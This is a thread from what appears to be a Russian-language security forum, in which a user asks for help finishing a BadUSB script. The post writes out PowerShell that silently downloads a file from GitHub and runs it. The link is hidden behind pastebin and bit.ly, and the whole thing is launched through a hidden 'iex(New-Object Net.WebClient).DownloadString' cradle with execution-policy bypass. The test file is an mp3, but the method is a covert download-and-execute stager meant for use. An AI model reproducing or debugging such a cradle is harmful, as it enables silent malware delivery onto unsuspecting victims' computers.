Toggle sidebar

  • B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 🚨 29 мая стартует курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    После старта курса запись открыта еще 10 дней Подробнее о курсе ...

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

Нужна помощь с командой PowerShell

  • Автор темы Автор темы misterX
  • Дата начала Дата начала
misterX

misterX

Grey Team
01.06.2022
286
11
Всем доброго времени суток товарищи. Нужна ваша помощь в завершении скрипта.
Сегодня писал скрипт для BadUSB, точнее сказать его кости - по факту нужна тихое и невидимое скачивание и установка(скажу сразу что не создавал какой либо Payload, а всего лишь тест на файле mp3)
Файл лежит на GitHub, от туда взял его ссыль на RAF и добавил в этот код для скачивания и сохранки на диск
Код: 
$download_url = "http://raw.githubusercontent.com/prostixciber/probnik/main/Eminem%20%E2%80%93%20Mockingbird.mp3"
$local_path = "C:\Users\Public\Downloads\Eminem%20%E2%80%93%20Mockingbird.mp3"
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($download_url, $local_path)

cd C:\Users\Public\Downloads
.\Eminem%20%E2%80%93%20Mockingbird.mp3
Далее конечно прогнал через pastebin и bitly для уменьшения ссылок и в итоге для PowerShell получилась команда
Код: 
iex(New-Object Net.WebClient).DownloadString("https://bit.ly/43u3LT2")
Далее мне нужно что бы PowerShell запустил эту строку через "Выполнить" в скрытом режиме - вот что пишу
Код: 
powershell -ep bypass -nop -w 1 iex(New-Object Net.WebClient).DownloadString("https://bit.ly/43u3LT2")
Видно что Shell запустился и тут же закрылся(это норма для скрытого режима), но файл не скачивается и само собой не запускается.
Подскажите что не так в команде? Видел и пробовал другие типа Hiden - не решило проблему.
Код: 
iex(New-Object Net.WebClient).DownloadString("https://bit.ly/43u3LT2")
- сама команда работает, то есть и скачивает и делает запуск mp3 чере Shell, но при попытке запустить команду
Код: 
powershell -ep bypass -nop -w 1 iex(New-Object Net.WebClient).DownloadString("https://bit.ly/43u3LT2")
через "Выполнить" ничего не выходит. Очень бы хотелось увидеть подсказки или наводящие мысли на решение этой задачи)
Заранее спасибо.
 
Последнее редактирование:
Сортировать по дате Сортировать по голосам
После долгого и упорного поиска и изучения, ответ всё таки был найден - задача решена)
 
За 0 Против
Решение
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD

Верх Низ